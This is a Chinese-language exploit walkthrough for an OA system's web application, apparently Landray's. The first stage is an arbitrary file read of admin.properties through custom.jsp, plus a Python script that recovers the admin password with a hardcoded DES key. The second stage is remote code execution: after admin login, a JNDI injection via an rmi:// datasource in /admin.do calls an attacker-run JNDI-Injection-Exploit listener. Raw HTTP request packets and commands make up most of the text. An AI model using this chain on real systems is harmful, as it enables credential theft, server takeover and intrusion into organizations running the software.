自行搭建环境:
漏洞路径:
1.文件读取
/sys/ui/extend/varkind/custom.jsp
2.rce
/admin.do
漏洞验证:
读取管理员密码配置文件得到加密的管理员密码
数据包:
1
2
3
4
5
6
7
8
9
10
11
12
13
| POST //sys/ui/extend/varkind/custom.jsp HTTP/1.1
Host: 192.168.1.88:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 90
var=%7B%22body%22%3A%7B%22file%22%3A%22%2FWEB-INF%2FKmssConfig%2Fadmin.properties%22%7D%7D
|
对秘密的密码进行解密得到明文密码
代码已集成在下面的脚本中
使用密码登录管理后台
http://192.168.1.88:8080/admin.do
下载利用工具
https://github.com/welk1n/JNDI-Injection-Exploit/releases/tag/v1.0
在服务器搭建漏洞利用工具进行监听
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "ping ldycd7.dnslog.cn" -A 192.168.1.1
发送利用数据包(带上登录后台的cookie)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
| POST /admin.do HTTP/1.1
Host: xx.xx.xx.xx
Cookie: JSESSIONID=011EBEEDF3323F7CFFCB31BF42B48B53
Content-Length: 60
Cache-Control: max-age=0
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="90", "Google Chrome";v="90"
Sec-Ch-Ua-Mobile: ?0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
Origin:
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
method=testDbConn&datasource=rmi://xx.xx.xx.xx:1099/xxxxx
|
成功执行命令
获取密文并解密脚本
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
| import requests
import sys
import re
from Crypto.Cipher import DES
import base64
requests.packages.urllib3.disable_warnings()
proxy = {'http': '127.0.0.1:8080', 'https': '127.0.0.1:8080'}
class EncryptDate:
def __init__(self, key):
self.key = key
self.length = DES.block_size
self.aes = DES.new(self.key, DES.MODE_ECB)
self.unpad = lambda date: date[0:-ord(date[-1])]
def pad(self, text):
count = len(text.encode('utf-8'))
print(count)
add = self.length - (count % self.length)
print(add)
entext = text + (chr(add) * add)
print(entext)
return entext
def decrypt(self, decrData):
print('==========>>密文解密中')
res = base64.decodebytes(decrData.encode("utf8"))
msg = self.aes.decrypt(res).decode("utf8")
print('==========>>解密成功密码为: '+msg)
def Landraypass(url):
urllist = url+'/sys/ui/extend/varkind/custom.jsp'
headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3", "Accept-Encoding": "gzip, deflate",
"DNT": "1", "Connection": "close", "Upgrade-Insecure-Requests": "1",
"Content-Type": "application/x-www-form-urlencoded"}
data = {"var": "{\"body\":{\"file\":\"/WEB-INF/KmssConfig/admin.properties\"}}"}
passlist = requests.post(urllist, headers=headers, proxies=proxy, data=data)
print('==========>>正在抓取DES密文')
passDes = re.findall('(?<=password = )(.*?)(?=\\\\r)',passlist.text,re.I)
if len(passDes) == 0 :
print('==========!!:抓取密码失败可进行手动测试确认')
else:
passDeslist = passDes[0]
print('==========>>密文抓取成功: '+passDeslist)
cr = EncryptDate(b'kmssAdmi')
cr.decrypt(passDeslist)
if __name__ == '__main__':
if (len(sys.argv) == 2):
url = sys.argv[1]
Landraypass(url)
else:
print("python3 Landraypass.py http://xx.xx.xx.xx")
|
